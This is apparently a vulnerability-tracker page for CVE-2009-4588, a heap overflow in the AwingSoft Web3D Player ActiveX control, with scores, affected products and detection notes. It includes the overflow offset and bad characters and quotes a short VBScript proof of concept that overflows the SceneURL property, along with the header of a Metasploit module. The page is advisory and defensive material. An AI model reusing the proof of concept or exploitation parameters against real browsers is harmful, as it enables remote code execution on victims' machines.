CVE-2009-4588
published 2010-01-07CVE-2009-4588: Heap-based buffer overflow in the WindsPlayerIE.View.1 ActiveX control in WindsPly.ocx 3.5.0.0 Beta, 3.0.0.5, and earlier in AwingSoft Awakening Web3D Player…
PriorityP348critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
32.04%
98.1th percentile
Heap-based buffer overflow in the WindsPlayerIE.View.1 ActiveX control in WindsPly.ocx 3.5.0.0 Beta, 3.0.0.5, and earlier in AwingSoft Awakening Web3D Player and Winds3D Viewer allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long SceneUrl property value, a different vulnerability than CVE-2009-2386. NOTE: some of these details are obtained from third party information.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awingsoft | awakening_winds3d_player | — | — |
| awingsoft | awakening_winds3d_player | — | — |
| awingsoft | awakening_winds3d_viewer | — | — |
| awingsoft | awakening_winds3d_viewer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%00%00%01%00
- →Detect heap spray pattern: repeated 0x0C0C0C0C return address used in exploit targeting WindsPlayerIE.View.1 ActiveX control ↗
- →Monitor for instantiation of the WindsPlayerIE.View.1 ActiveX CLSID/ProgID in browser contexts, especially with long SceneURL property values (offset 8984 bytes triggers overflow) ↗
- →Payload bad characters for this exploit are null byte, tab, newline, carriage return, single quote, and backslash: \x00\x09\x0a\x0d'\ — shellcode in network traffic will avoid these bytes ↗
- →PoC uses a buffer of 8704 'A' characters followed by 4 bytes 'bbbb' and escape sequence %00%00%01%00 to trigger the overflow in WindsPly.ocx SceneURL property ↗
- →Exploit delivery is via HTML page with JavaScript heap spray; page uses http-equiv and javascript refresh methods to leave the page post-exploitation ↗
- ·Affected versions of WindsPly.ocx are 3.0.0.5, 3.5.0.0 Beta, and 3.6.0.0 Beta; the Metasploit module targets all Windows XP SP0-SP3 with IE 6.0 SP0-2 and IE 7.0 ↗
- ·The Metasploit module sets EXITFUNC to 'process' and uses a StackAdjustment of -3500; payload space is limited to 1024 bytes ↗
- ·This is a different vulnerability from CVE-2009-2386, though both affect the same ActiveX control ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2009-4588 AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit)
AwingSoft Winds3D Player - SceneURL Buffer Overflow (Metasploit)
---
##
# $Id: awingsoft_web3d_bof.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# awingsoft_web3d_bof.rb
#
# AwingSoft Web3D Player 'SceneURL()' Buffer Overflow exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
# - Internet Explorer 6, Windows XP SP2
# - Internet Explorer 7, Windows XP SP3
#
# WindsPly.ocx versions tested:
# - 3.0.0.5
# - 3.5.0.0
# - 3.6.0.0 (beta)
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Meta
Exploit-DB
AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)
exploitdb·2009-07-10
CVE-2009-4588 AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)
AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)
---
AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow
url: http://www.awingsoft.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/
Dedicated to aaannamariaaa :D
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
File: WindsPly.ocx
Ver.:
buff = String(8704, "A")
mReg = unescape("bbbb")
mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW
buf1 = String(88, "c")
buf2 = String(47284, "D")
test.SceneURL = buff + mReg + mExc + buf1 + buf2
# milw0rm.com [2009-07-10]
Metasploit
AwingSoft Winds3D Player SceneURL Buffer Overflow
metasploit
AwingSoft Winds3D Player SceneURL Buffer Overflow
AwingSoft Winds3D Player SceneURL Buffer Overflow
This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/35764http://www.exploit-db.com/exploits/9116http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/51672http://secunia.com/advisories/35764http://www.exploit-db.com/exploits/9116http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/51672
2010-01-07
Published